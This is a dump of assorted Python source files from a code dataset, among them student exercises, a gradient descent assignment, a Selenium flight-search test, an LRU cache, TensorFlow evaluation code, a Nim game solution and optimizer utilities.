3、将列表中比正整数X小的偶数去掉,未去掉的数添加到新列表中,并返回-------返回值中的new_array\r\n\"\"\"\r\n\r\n\r\ndef work3_1(array, x):\r\n \"\"\"用推导式\"\"\"\r\n # 比x大的个数\r\n res1 = len({i for i in array if i > x})\r\n # 正整数X小的所有偶数:放在li1中\r\n li1 = list(filter(lambda i: i < x and i % 2 == 0, array))\r\n # 去除比X小的偶数\r\n [array.remove(i) for i in li1]\r\n new_list = array.copy()\r\n return res1, li1, new_list\r\n\r\n\r\n\"\"\"\r\n4、定义一个函数实现以下功能,第一个元素是数据标识,第二个元素的数值必须大于等于50才返回,\r\n不够50往后累加加到最后如果不够50也直接返回,因为没有可加的数据了\r\n例子1 :\r\na = [[1,3],[2,51],[3,49],[4,42],[5,42]] #入参 \r\na1 = [[2,54],[4,91],[5,42]] #返回 \r\n例子2:\r\nb = [[1,50],[2,5],[3,10],[4,42],[5,42],[6,10]] #入参\r\nb1 = [[1,50],[4,57],[6,52]] #返回\r\n\"\"\"\r\n\r\n\r\n# 第四题:\r\ndef work4(array):\r\n li = []\r\n sum = 0\r\n for i in array:\r\n sum += i[1]\r\n # 第一种元素值大于等50\r\n if sum >= 50 or len(array) == i[0]:\r\n i[1] = sum\r\n li.append(i)\r\n sum = 0\r\n return li\r\n\r\n\r\na = [[1, 3], [2, 51], [3, 49], [4, 42], [5, 42]]\r\nb = [[1, 50], [2, 5], [3, 10], [4, 42], [5, 42], [6, 10]]\r\n\r\nprint(work4(b))\r\n","sub_path":"python基础高阶编程/py_03day/task_02day.py","file_name":"task_02day.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"565147770","text":"\n# -- ------------------------------------------------------------------------------------ -- #\n# -- proyecto: IDI-II\n# -- codigo: IDI_II_Tarea4_JFME.py\n# -- repositorio: https://github.com/IFFranciscoME/IDI_II_GIT\n# -- ------------------------------------------------------------------------------------ -- #\n\nimport sympy as sp\nfrom sympy import symbols, N\nfrom sympy.plotting import plot3d, plot\n\n\n# -- ---------------------------------------- FUNCION: Gradiente Descendente (Ascendente) -- #\n# -- ------------------------------------------------------------------------------------ -- #\n# -- --\n\ndef f_grad(param_fun, param_x, param_y, param_e, param_p):\n \"\"\"\n Parameters\n ----------\n param_fun : str : funcion a utilizar\n param_x : numeric : valor inicial para x0\n param_y : numeric : valor inicial para y0\n param_e : numeric : exactitud deseada\n param_p : int : cantidad de digitos para la precision\n\n Returns\n -------\n p_x0 : numeric : componente en x del punto minimo (maximo) encontrado\n p_y0 : numeric : componente en y del punto minimo (maximo) encontrado\n\n Debugging\n ---------\n param_fun = 'x**2 - 24*y + y**2 -10*y'\n param_x = -2\n param_y = 0\n param_e = 10e-3\n param_p = 4\n \"\"\"\n\n # Establecer que es una expresion con variable simbolica\n param_fun = sp.S(param_fun)\n # diferencial de la funcion respecto a x\n f_x = param_fun.diff(x)\n # diferencial de la funcion respecto a y\n f_y = param_fun.diff(y)\n # factor de \"incremento\"\n theta = .1\n # iteraciones\n iteraciones = 0\n\n while True:\n # evaluacion de expresion de gradiente descendente\n\n temp_x = theta*N(f_x.subs(x, param_x).subs(y, param_y)).evalf()\n temp_y = theta*N(f_y.subs(x, param_x).subs(y, param_y)).evalf()\n\n # actualizar contador de iteraciones\n iteraciones += 1\n print(iteraciones)\n\n if abs(temp_x - param_x) < param_e and abs(temp_y - param_y) < param_e:\n break\n\n if iteraciones > 100:\n print(\"Algo paso que son muchas iteraciones sin llegar al resultado\")\n break\n\n param_x = temp_x\n param_y = temp_y\n\n print(\"f(x,y) = \" + str(param_fun) + \"converge\")\n print(\"el número de interaciones fueron: \", iteraciones, sep=\" \")\n print('el error es: ' + str(abs(temp_x - param_x)))\n\n\n# Declarar x, y, z como variables simbolicas\nx, y, z = symbols('x y z')\n\n# Funcion 1\nf_1 = 'x**4 - 3*x**3 + 2'\n# Establecer que es una expresion con variable simbolica\nf_n = sp.S(f_1)\n# Graficar la funcion para explorar dominio\nplot(f_1, (x, -2, +4))\n# Evaluar funcion de gradiente descendente\nf_grad(param_fun=0, param_x=0, param_y=0, param_e=0, param_p=0)\n\n# -- Notas de ejercicio 1\n# grafique de -10 a 10\n# la funcion crece indefinidamente en ambos sentidos, hacia x++ y x--\n# grafique, puse x0=-2, con theta = 0.5, resultado fue que mando a x=32\n\n# Funcion 2\nf_2 = 'x**2 - 24*y + y**2 -10*y'\n# Establecer que es una expresion con variable simbolica\nf_2 = sp.S(f_2)\n# Graficar la funcion para explorar dominio\nplot3d(f_2, (x, -4, +4), (y, -4, +4))\n# Evaluar funcion de gradiente descendente\nf_grad(param_fun=f_2, param_x=1, param_y=-3, param_e=10e-3, param_p=4)\n\n# -- Notas de ejercicio 2\n# grafique de x=-10 a x=10, y=-10 a y=10 y note que la funcion es bastante \"simple\"\n# reduje a -4 todos los valores\n# deje a x=1 y y =-3 y fue bastante rapida la convergencia\n\n# Funcion 3\nf_3 = 'sin((1/2)*x**2 - (1/4)*y**2 + 3)*cos(2*x + 1 - exp(y))'\n# Establecer que es una expresion con variable simbolica\nf_3 = sp.S(f_3)\n# Graficar la funcion para explorar dominio\nplot3d(f_3, (x, -4, +4), (y, -4, +4))\n# Evaluar funcion de gradiente descendente\nf_grad(param_fun=f_3, param_x=-1, param_y=-4, param_e=10e-3, param_p=4)\n\n# -- Notas de ejercicio 3\n# grafique de x=-4 a x=4, y=-4 a y=4 y note que la funcion es bastante \"complicada\"\n# deje valores de x=-1 a y=-4, que elegi visualmente como una \"cima\" o valor maximo\n# y la funcion convergio bastante rapido a un minimo local\n","sub_path":"Tarea_4_Gradiente_Descendente/IDI_II_Tarea4_JFME.py","file_name":"IDI_II_Tarea4_JFME.py","file_ext":"py","file_size_in_byte":4024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"147453149","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nhf = 8.75*10**-20\nkB = 1.381*10**-23\neps = 1.218*10**-21\nTmin = 20\nTmax = 2000\nnsteps = 198000\n\n\nT = np.linspace(Tmin,Tmax,nsteps)\n\nj = np.arange(1,88,2)\n\n\nx = kB*T/eps\nZ_para = np.ones(len(x))\nU_para = np.zeros(nsteps)\n\ndx = x[100]-x[99]\n\nfor k in range(0,nsteps):\n Z_para[k] = np.sum((2*j+1)*np.exp(-j*(j+1)/x[k]))\n U_para[k] = np.sum(j*(j+1)*(2*j+1)*np.exp(-j*(j+1)/x[k])/Z_para[k])\n\nCv_para = np.diff(U_para)/dx\n\nj = np.arange(0,88,2)\nZ_orth = np.ones(len(x))\nU_orth = np.zeros(nsteps)\n\nfor k in range(0,nsteps):\n Z_orth[k] = np.sum((2*j+1)*np.exp(-j*(j+1)/x[k]))\n U_orth[k] = np.sum(j*(j+1)*(2*j+1)*np.exp(-j*(j+1)/x[k])/Z_orth[k])\n\nCv_orth = np.diff(U_orth)/dx\n\n\nCv_rot = 3*Cv_orth/4+Cv_para/4\n\nCv_tr = 3/2\n\nCv_vib = (hf/(kB*T))**2/(2*np.sinh(hf/(kB*T))-2)\n\n\nplt.figure()\nplt.plot(x,Z_para,'r')\nplt.plot(x,Z_orth,'b')\nplt.xlabel('kT/eps')\nplt.ylabel('Partition function')\nplt.show()\n\nplt.figure()\nplt.plot(x,U_para)\nplt.plot(x,U_orth)\nplt.xlabel('kT/eps')\nplt.ylabel('U')\nplt.show()\n\nx = np.delete(x,0)\nT = np.delete(T,0)\n\nplt.figure()\nplt.plot(T,Cv_para)\nplt.plot(T,Cv_orth)\nplt.xlabel('kT/eps')\nplt.ylabel('Cv/Nk')\nplt.show()\n\nCv_vib = np.delete(Cv_vib,0)\n\nplt.figure()\nplt.plot(T,Cv_vib+Cv_tr+Cv_rot)\nplt.ylim(0,3)\nplt.xscale('log')\nplt.xlabel('T (K)')\nplt.ylabel('Cv/Nk')\nplt.show()\n","sub_path":"opdracht.py","file_name":"opdracht.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"250626447","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.select import Select\nfrom functions.handyWrappers import HandyWrappers\nfrom datetime import datetime\nimport time\nimport random\nfrom functions.explicit_wait import ExplicitWaitType\n\n\nclass TestCase1():\n def testSuite(self):\n driver = webdriver.Chrome(executable_path=\"C:\\Selenium\\chromedriver.exe\")\n URL = \"https://www.expedia.com/\"\n driver.maximize_window()\n driver.implicitly_wait(10)\n driver.get(URL)\n wait = ExplicitWaitType(driver)\n hw = HandyWrappers(driver)\n ## generic method to select dates from calendar\n\n destinationForScreenshots = \"C:\\\\Users\\S4etovodov\\Desktop\\Selenium_screenshots\\\\\"\n\n flightsBtn = hw.getElement(\"tab-flight-tab-hp\")\n flightsBtn.click()\n\n advancedOptions = hw.getElement(\"flight-advanced-options-hp-flight\")\n advancedOptions.click()\n\n time.sleep(2)\n\n nonstopCheckBox = hw.getElement(\"advanced-flight-nonstop-hp-flight\")\n nonstopCheckBox.click()\n\n time.sleep(2)\n\n preferredAirlineDrDwn = hw.getElement(\"flight-advanced-preferred-airline-hp-flight\")\n sel = Select(preferredAirlineDrDwn)\n sel.select_by_value(\"SU\")\n\n time.sleep(2)\n\n classDrpDwn = hw.getElement(\"flight-advanced-preferred-class-hp-flight\")\n sel1 = Select(classDrpDwn)\n sel1.select_by_value(\"business\")\n\n OriginField = hw.getElement(\"flight-origin-hp-flight\")\n OriginField.send_keys(\"new\")\n time.sleep(2)\n OriginItem = hw.getElement(\"// ul[ @ id = 'typeaheadDataPlain'] // li/a[contains(@data-value,'New York (NYC-All Airports)')]\", \"xpath\")\n OriginItemText = OriginItem.text\n print(OriginItemText)\n OriginItem.click()\n time.sleep(2)\n\n flyingToField = hw.getElement(\"flight-destination-hp-flight\")\n flyingToField.send_keys(\"mos\")\n time.sleep(2)\n flyingToFieldItem = hw.getElement(\"//ul[@id='typeaheadDataPlain']//li/a[contains(@data-value, 'Moscow, Russia (MOW-All Airports)')]\",\"xpath\")\n flyingToFieldItem.click()\n\n time.sleep(2)\n\n oneWayBtn = hw.getElement(\"flight-type-one-way-label-hp-flight\")\n oneWayBtn.click()\n\n time.sleep(2)\n departingField = hw.getElement(\"//input[@id='flight-departing-single-hp-flight']\", \"xpath\")\n departingField.click()\n\n\n monthsSel = {\n \"january\": '0',\n \"february\": '1',\n \"september\": '8'\n }\n\n\n depDateMonth = \"september\"\n depDateDay = \"18\"\n depDateYear = \"2018\"\n\n print(monthsSel[depDateMonth])\n\n depDXpath = \"//div[@id='flight-departing-wrapper-single-hp-flight']//button[contains(@data-year, '{0}') and contains(@data-month, '{1}') and contains(@data-day, '{2}')]\"\n depDateXpath = depDXpath.format(depDateYear, monthsSel[depDateMonth], depDateDay)\n print(depDateXpath)\n departureDate = hw.getElement(depDateXpath, \"xpath\")\n departureDate.click()\n #//div[ @ id = 'flight-departing-wrapper-single-hp-flight'] // button[contains( @ data - year, '2018') and contains( @ data - month, '8') and contains( @ data - day, '18')]\n #driver.find_element(By.XPATH, \"//div[@id='flight-departing-wrapper-single-hp-flight']//button[contains (@data-year, '2018') and contains (@data-month, '8') and contains (@data-day, '18')]\").click()\n #el = wait.waitForElement(\"//div[@id='flight-departing-wrapper-single-hp-flight']//button[contains(@data-year,'2018') and contains( @data-month, '8') and contains(@data-day, '18')]\", \"xpath\", 25).click()\n\n hw.takeScrShot(destinationForScreenshots)\n\n\n element = wait.waitForElement(\"//form[@id='gcw-flights-form-hp-flight']/div[8]/label/button\", \"xpath\", 10)\n element.click()\n time.sleep(2)\n\n hw.takeScrShot(destinationForScreenshots)\n\n driver.quit()\n\nTestExecution1 = TestCase1()\nTestExecution1.testSuite()\n\n","sub_path":"Testing3(expedia.com).py","file_name":"Testing3(expedia.com).py","file_ext":"py","file_size_in_byte":4040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"265506228","text":"# Q 11 Assignment\nimport math\n\nC = 50\nH = 30\nd = input(\"enter comma separated decimal input\")\nlist1 = d.split(',')\nlength = len(list1)\nprint(d)\nprint(list1)\nprint(length)\n\nfor i in list1:\n print(i)\n D = int(i)\n Q = math.sqrt((2 * C * D)/H)\n \n print(\"Q = \", int(Q))\n","sub_path":"pycode/original1.Question11CSVinput.py","file_name":"original1.Question11CSVinput.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"311127409","text":"# Input\n# [\"LRUCache\", \"put\", \"put\", \"get\", \"put\", \"get\", \"put\", \"get\", \"get\", \"get\"]\n# [[2], [1, 1], [2, 2], [1], [3, 3], [2], [4, 4], [1], [3], [4]]\n# Output\n# [null, null, null, 1, null, -1, null, -1, 3, 4]\n\n# Explanation\n# LRUCache lRUCache = new LRUCache(2);\n# lRUCache.put(1, 1); // cache is {1=1}\n# lRUCache.put(2, 2); // cache is {1=1, 2=2}\n# lRUCache.get(1); // return 1\n# lRUCache.put(3, 3); // LRU key was 2, evicts key 2, cache is {1=1, 3=3}\n# lRUCache.get(2); // returns -1 (not found)\n# lRUCache.put(4, 4); // LRU key was 1, evicts key 1, cache is {4=4, 3=3}\n# lRUCache.get(1); // return -1 (not found)\n# lRUCache.get(3); // return 3\n# lRUCache.get(4); // return 4\n\nclass Node:\n def __init__(self, key,val):\n self.key,self.val = key,val\n self.prev = self.next = None\n\nclass LRUCache:\n\n def __init__(self, capacity: int):\n self.cap = capacity\n self.cache = {}\n self.left, self.right = Node(0,0), Node(0,0)\n self.left.next, self.right.prev = self.right, self.left \n\n def get(self, key: int) -> int:\n if key in self.cache:\n self.remove(self.cache[key])\n self.insert(self.cache[key])\n return self.cache[key].val\n else:\n return -1\n \n def remove(self,node):\n prev, nex = node.prev, node.next\n prev.next, nex.prev = nex, prev\n \n def insert(self,node):\n prev,nex = self.right.prev, self.right\n prev.next = nex.prev = node\n node.next,node.prev = nex,prev \n \n def put(self, key: int, value: int) -> None:\n if key in self.cache:\n self.remove(self.cache[key])\n self.cache[key] = Node(key,value)\n self.insert(self.cache[key])\n \n if len(self.cache) > self.cap:\n lru = self.left.next\n self.remove(lru)\n del self.cache[lru.key]\n \n \n\n\n# Your LRUCache object will be instantiated and called as such:\n# obj = LRUCache(capacity)\n# param_1 = obj.get(key)\n# obj.put(key,value)","sub_path":"team_work/Vincent/linkList/medium/LRU Cache/Q146.py","file_name":"Q146.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"298232270","text":"__author__ = 'Joe Linn'\n\nimport pylastica.aggregation.abstractaggregation as abstract\nimport pylastica.filter.abstractfilter as abstractfilter\n\n\nclass Filter(abstract.AbstractAggregation):\n def set_filter(self, filter):\n \"\"\"\n Set the filter for this aggregation\n @param filter: the filter to use for this aggregation\n @type filter: pylastica.filter.abstractfilter.AbstractFilter\n @return:\n @rtype: Filter\n \"\"\"\n if not isinstance(filter, abstractfilter.AbstractFilter):\n raise TypeError(\"filter must be an instance of an implementation of AbstractFilter: %r\" % filter)\n return self.set_param(\"filter\", filter.to_dict())\n\n def to_dict(self):\n \"\"\"\n\n @return:\n @rtype: dict\n \"\"\"\n return {\n \"filter\": self.get_param(\"filter\"),\n \"aggs\": self._aggs\n }","sub_path":"pylastica/aggregation/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"49308241","text":"import random\n#Decide what type of game you will be playing. For now there is just Gladiator\nwhile True:\n try:\n GameType = input(\"What type of game do you want to play? For now there is only Gladiator.\\n>\").lower().split()\n except ValueError:\n print(\"Sorry, I didn't understand that!\")\n continue\n if GameType[0] == \"gladiator\":\n from Gladiator import GladiatorMain\n\n","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"337571226","text":"#! /usr/bin/env python\n\nimport tensorflow as tf\nimport numpy as np\nimport os\nfrom tensorflow.contrib import learn\n\n\ndef batch_data(layer1, layer2, batch_size=64):\n data_size = len(layer1)\n num_batches_per_epoch = int((data_size-1)/batch_size) + 1\n \n for batch_num in range(num_batches_per_epoch):\n start_index = batch_num * batch_size\n end_index = min((batch_num + 1) * batch_size, data_size)\n \n batch_layer1_data = layer1[start_index:end_index]\n batch_layer2_data = layer2[start_index:end_index]\n \n yield zip(batch_layer1_data, batch_layer2_data)\n \n \ndef predict(layer1, layer2):\n \n # Map data into vocabulary\n vocab_path = os.path.join(os.path.curdir, \"mlmodels\", \"vocab\")\n vocab_processor = learn.preprocessing.VocabularyProcessor.restore(vocab_path)\n x_layer1 = np.array(list(vocab_processor.transform(layer1)))\n x_layer2 = np.array(list(vocab_processor.transform(layer2)))\n \n # 3D arrays\n x_test = np.dstack([x_layer1, x_layer2])\n x_test = x_test.reshape((x_test.shape[0], x_test.shape[2], x_test.shape[1]))\n \n # Read in the model form the latest checkpoint. There are a lot of \n # components to load in separately. \n checkpoint_path = os.path.join(os.path.curdir, \"mlmodels\", \"checkpoints\")\n checkpoint_file = tf.train.latest_checkpoint(checkpoint_path)\n graph = tf.Graph()\n with graph.as_default():\n session_conf = tf.ConfigProto(\n allow_soft_placement=True,\n log_device_placement=False)\n sess = tf.Session(config=session_conf)\n with sess.as_default():\n # Load the saved meta graph and restore variables\n saver = tf.train.import_meta_graph(\"{}.meta\".format(checkpoint_file))\n saver.restore(sess, checkpoint_file)\n \n # Get the placeholders from the graph by name\n input_x = graph.get_operation_by_name(\"input_x\").outputs[0]\n \n # If dropout was used to regularize, get that information.\n dropout_keep_prob = graph.get_operation_by_name(\"dropout_keep_prob\").outputs[0]\n \n # Tensors we want to evaluate\n predictions = graph.get_operation_by_name(\"output/predictions\").outputs[0]\n \n all_predictions = sess.run(predictions, {input_x: x_test, dropout_keep_prob: 1.0})\n \n return all_predictions\n","sub_path":"cnn_text_classification_tf/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":2433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"359343954","text":"#!/usr/bin/python\n\nimport fnmatch\nimport os\n\ndef createNewFile(filename_prog):\n\tnewFile = open(filename_prog[0:-4] + \"py\", \"w\");\n\toriginalFile = open(filename_prog, \"r\")\n\tnewText = \"\"\n\n\tfor line in originalFile:\n\t\tif \"import\" in line:\n\t\t\tnewText += line\n\t\telif line[0:6] == \"CIKLUS\":\n\t\t\tnewText += swapLoop(line)\n\t\telif line[0:8] == \"ELAGAZAS\":\n\t\t\tnewText += swap(line, \"ELAGAZAS\")\n\t\telse:\n\t\t\tnewText += swapSequence(line)\n\n\tnewFile.write(newText[:-1])\n\ndef swap(line, swapstr, inner = False):\n\tsplittedLine = line.split(\"[\");\n\n\tif swapstr == \"CIKLUS\":\n\t\treturnLine = splittedLine[0].rstrip().replace(swapstr, \"for\") + \" :\"\n\telse:\n\t\treturnLine = splittedLine[0].rstrip().replace(swapstr, \"if\") + \" :\"\n\n\trows = swapSequence(splittedLine[2].rstrip()[0:-2]).split(\"\\n\")\n\n\tfor i in rows:\n\t\tif(inner):\n\t\t\treturnLine += \"\\n \" + i\n\t\telse:\n\t\t\treturnLine += \"\\n \" + i\n\n\treturn returnLine[:-4]\n\ndef swapLoop(line):\n\treturnLine = \"\"\n\n\tsplittedLine = line.split(\";\");\n\n\tinnerSplit = splittedLine[0].split(\"[\")\n\treturnLine = innerSplit[0].rstrip().replace(\"CIKLUS\", \"for\") + \" :\"\n\t\n\tif innerSplit[2].startswith(\"CIKLUS\"):\n\t\treturnLine += \"\\n \" + swap(innerSplit[2], \"CIKLUS\").rstrip()\n\telse:\n\t\treturnLine += \"\\n \" + innerSplit[2].rstrip()\n\n\tfor i in range(1, len(splittedLine)):\n\t\tif splittedLine[i].startswith(\"CIKLUS\"):\n\t\t\tif i == len(splittedLine) - 1:\n\t\t\t\treturnLine += \"\\n \" + swap(splittedLine[i].rstrip()[:-2], \"CIKLUS\", True).rstrip()\n\t\t\telse:\n\t\t\t\treturnLine += \"\\n \" + swap(splittedLine[i], \"CIKLUS\", True).rstrip()\n\t\telse:\n\t\t\tif i == len(splittedLine) - 1:\n\t\t\t\treturnLine += \"\\n \" + splittedLine[i].rstrip()[:-2]\n\t\t\telse:\n\t\t\t\treturnLine += \"\\n \" + splittedLine[i]\n\n\treturnLine += \"\\n\"\n\treturn returnLine\n\ndef swapSequence(line):\n\tsplittedLine = line.split(\";\")\n\treturnLine = \"\"\n\n\tfor i in splittedLine:\n\t\treturnLine += i.rstrip() + \"\\n\"\n\n\treturn returnLine\n\nfor file in os.listdir('.'):\n if fnmatch.fnmatch(file, '*.prog'):\n createNewFile(file)","sub_path":"Part_II./main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"349862933","text":"import collections\n\nn, m = map(int, input().split())\nw = map(int, input().split())\nmemo = [set() for _ in range(m)]\np = [[] for _ in range(m + 1)] \nfor i in range(i, m + 1):\n x, y = map(int, input().split())\n memo[x-1].add((i, y - 1))\n memo[y-1].add((i, x - 1))\n w[x-1] -= 1\n w[y-1] -= 1\n\nque = collections.deque()\nfor i in range(n):\n if w[i] >= 0:\n que.append(i)\n\nres = collections.deque()\nexist = [False] * (m + 1)\nwhile que and len(res) < m:\n x = que.popleft()\n for i, o in memo[x]:\n if i not in exist:\n res.append(i)\n exist.add(i)\n memo[o] += 1\n if memo[o] == 0:\n que.append(o)\nif len(res) != m:\n print('DEAD')\nelse:\n print('ALIVE')\n for i in reversed(res):\n print(i, end=' ') \n print()\n\n\n\n\n\n","sub_path":"Codeforces Round #652 (Div. 2)/.history/E_DeadLee_20200703105634.py","file_name":"E_DeadLee_20200703105634.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"304125719","text":"def possible_plan(n,r,w):\n global cnt\n global visited\n\n if n == r:\n cnt += 1\n else:\n for i in range(N):\n if visited[i] == 0 and w + kits[i] - K >= 500:\n visited[i] = 1\n possible_plan(n,r+1, w+kits[i] - K)\n visited[i] = 0\n\nN, K = map(int, input().split())\nkits = list(map(int, input().split()))\nvisited = [0 for _ in range(N)]\ncnt = 0\n\npossible_plan(N,0,500)\nprint(cnt)","sub_path":"baekjun/근손실.py","file_name":"근손실.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"418939870","text":"from sklearn.naive_bayes import GaussianNB\nfrom mining.preprocessing import *\n\nclass Classify:\n #Data should be acquired from file_path[0] in main_content begin(push button) event handle\n def __init__(self, data):\n\n #training data\n self.training = Preprocessing_Train()\n\n self.training_data = self.training.display_Training()\n self.training_class = self.training.display_Class()\n\n #Data to predict\n self.data = data\n self.new_data = Preprocessing_Data(self.data)\n self.new_data_display = self.new_data.display()\n\n #classification training and prediction\n self.classifier = GaussianNB()\n self.classifier.fit(self.training_data, self.training_class)\n self.predict = self.classifier.predict(self.new_data_display)\n #print('training_data: \\n', self.training_data.shape)\n #print('training_class: \\n', self.training_class.shape)\n #print('new_data_display \\n', self.new_data_display.shape)\n\n def raw_display(self):\n return self.predict\n\n def display_table(self):\n self.table_data = DataFrame(read_excel(self.data, header = 0))\n\n #display NOMBRE | APELLIDO | CORREO\n self.table_data_column_removed = self.table_data.drop(self.table_data.columns[[0, 1, 2, 3, 4, 5, 8, 9, 10, 12, 13, 14, 15, 16]], axis = 1)\n #self.table_data_row_removed = self.table_data_column_removed.drop(self.table_data_column_removed.index[[0]])\n #self.table_data_removed = self.table_data_row_removed\n self.table_data_removed = self.table_data_column_removed\n\n #add column name to predicted data\n self.predicted_data = DataFrame(self.predict)\n self.predicted_data.columns = [\"CLASS\"]\n\n #connected the predicted results with the data we want to display\n\n self.output_data = concat([self.table_data_removed, self.predicted_data], axis = 1)\n return array(self.output_data)\n\n\n def full_display(self):\n self.full_data = DataFrame(read_excel(self.data, header = 0))\n self.predicted_data = DataFrame(self.predict)\n self.predicted_data.columns = [\"CLASS\"]\n self.output_data = concat([self.full_data, self.predicted_data], axis=1)\n return self.output_data\n\n\n\n#cls = Classify('/Users/rtassara2006/Dropbox/QUINTO2016/TALLER DE INGENIERIA DE SOFTWARE/TEST.xlsx')\n#print('raw data: \\n', cls.raw_display())\n#print('display table \\n', cls.display_table())\n#print(cls.full_display())","sub_path":"mining/algorithms.py","file_name":"algorithms.py","file_ext":"py","file_size_in_byte":2477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"263745680","text":"\"\"\"\nModule which acts as a analytic Jacobian calculator\n\"\"\"\nfrom fitbenchmarking.jacobian.base_jacobian import Jacobian\nfrom fitbenchmarking.utils.exceptions import NoJacobianError\n\nfrom numpy import matmul\n\n\n# pylint: disable=useless-super-delegation\nclass Analytic(Jacobian):\n \"\"\"\n Class to apply an analytical Jacobian\n \"\"\"\n\n def __init__(self, cost_func):\n super(Analytic, self).__init__(cost_func)\n if not callable(self.problem.jacobian):\n raise NoJacobianError(\"Problem set selected does not currently \"\n \"support analytic Jacobians\")\n\n def eval(self, params, **kwargs):\n \"\"\"\n Evaluates Jacobian of problem.eval_model\n\n :param params: The parameter values to find the Jacobian at\n :type params: list\n\n :return: Approximation of the Jacobian\n :rtype: numpy array\n \"\"\"\n x = kwargs.get(\"x\", self.problem.data_x)\n e = kwargs.get(\"e\", self.problem.data_e)\n jac = self.problem.jacobian(x, params)\n if self.problem.options.cost_func_type == \"weighted_nlls\":\n # scales each column of the Jacobian by the weights\n jac = jac / e[:, None]\n elif self.problem.options.cost_func_type == \"root_nlls\":\n # calculates the Jacobian of the root NLLS cost function\n jac = jac * self.problem.eval_model(params, x=x)[:, None] / 2\n return jac\n\n def eval_cost(self, params, **kwargs):\n \"\"\"\n Evaluates derivative of the cost function\n\n :param params: The parameter values to find the Jacobian at\n :type params: list\n\n :return: Computed derivative of the cost function\n :rtype: numpy array\n \"\"\"\n rx = self.cached_func_values(self.cost_func.cache_rx,\n self.cost_func.eval_r,\n params,\n **kwargs)\n J = self.eval(params, **kwargs)\n out = 2.0 * matmul(J.T, rx)\n return out\n","sub_path":"fitbenchmarking/jacobian/analytic_jacobian.py","file_name":"analytic_jacobian.py","file_ext":"py","file_size_in_byte":2043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"576911107","text":"\"\"\"\n拆分-Nim游戏\n给定 n 堆石子,两位玩家轮流操作,每次操作可以取走其中的一堆石子,然后放入两堆规模更小的石子\n(新堆规模可以为 0,且两个新堆的石子总数可以大于取走的那堆石子数),最后无法进行操作的人视为失败。\n\n问如果两人都采用最优策略,先手是否必胜。\n\n输入格式\n第一行包含整数 n。\n\n第二行包含 n 个整数,其中第 i 个整数表示第 i 堆石子的数量 ai。\n\n输出格式\n如果先手方必胜,则输出 Yes。\n\n否则,输出 No。\n\n数据范围\n1 ≤ n, ai ≤ 100\n输入样例:\n2\n2 3\n输出样例:\nYes\n================================================================\n相比于集合-Nim,这里的每一堆可以变成不大于原来那堆的任意大小的两堆\n即 a[i]可以拆分成 (b[i], b[j])\n为了避免重复规定 b[i] >= b[j],即:a[i] >= b[i] >= b[j],\n相当于一个局面拆分成了两个局面,由 SG函数理论,多个独立局面的 SG值,等于这些局面 SG值的异或和。\n因此需要存储的状态就是 sg(b[i]) ^ sg(b[j])(与集合-Nim的唯一区别)\n\"\"\"\nN, M = 100 + 10, 10000 + 10\n# F存储的是所有可能出现过的情况的 SG值, 初始化 F均为 -1,方便查看 SG(x)是否被记录过\nF = [-1] * M\n\n\ndef SG(x):\n # 因为取石子数目的集合 S是已经确定了的,\n # 所以在递归条件下,每个数的 SG值也都是确定的, 如果F[x]已经存储过了, 直接返回即可\n if F[x] != -1:\n return F[x]\n S = set() # S存储的是可供选择的集合\n\n for i in range(x):\n j = 0\n while j <= i: # 规定j不大于i,避免重复\n # 相当于一个局面拆分成了两个局面,由SG函数理论,多个独立局面的SG值,等于这些局面SG值的异或和\n S.add(SG(i) ^ SG(j))\n j += 1\n\n i = 0\n while True: # 循环完之后, 可以选出没有出现的最小自然数\n if not S.__contains__(i):\n F[x] = i # 对F[x]��值\n return i\n i += 1\n\n\nif __name__ == '__main__':\n n = int(input())\n A = list(map(int, input().split()))\n\n res = 0\n for i in range(n):\n res ^= SG(A[i]) # 计算所有堆的异或值,基本原理与Nim游戏相同\n\n print('Yes' if res >= 1 else 'No') # res != 0\n","sub_path":"2021/Algorithm/Python/Base/4_math_knowledge/894.py","file_name":"894.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"386571076","text":"from qcommunity.optimization.obj import get_obj_val, get_obj\nfrom scipy.optimize import minimize\nimport numpy as np\nimport nlopt\n\n\ndef optimize_obj(obj_val, num_parameters, params=None):\n options = {}\n try:\n init_points = params['sample_points'][0]\n except (KeyError, TypeError):\n init_points = np.random.uniform(-np.pi, np.pi, num_parameters)\n try:\n options['maxiter'] = params['n_iter'] + params['init_points']\n except (KeyError, TypeError):\n options['maxiter'] = 100\n\n def objective(x, grad):\n f = obj_val(x)\n return f\n\n 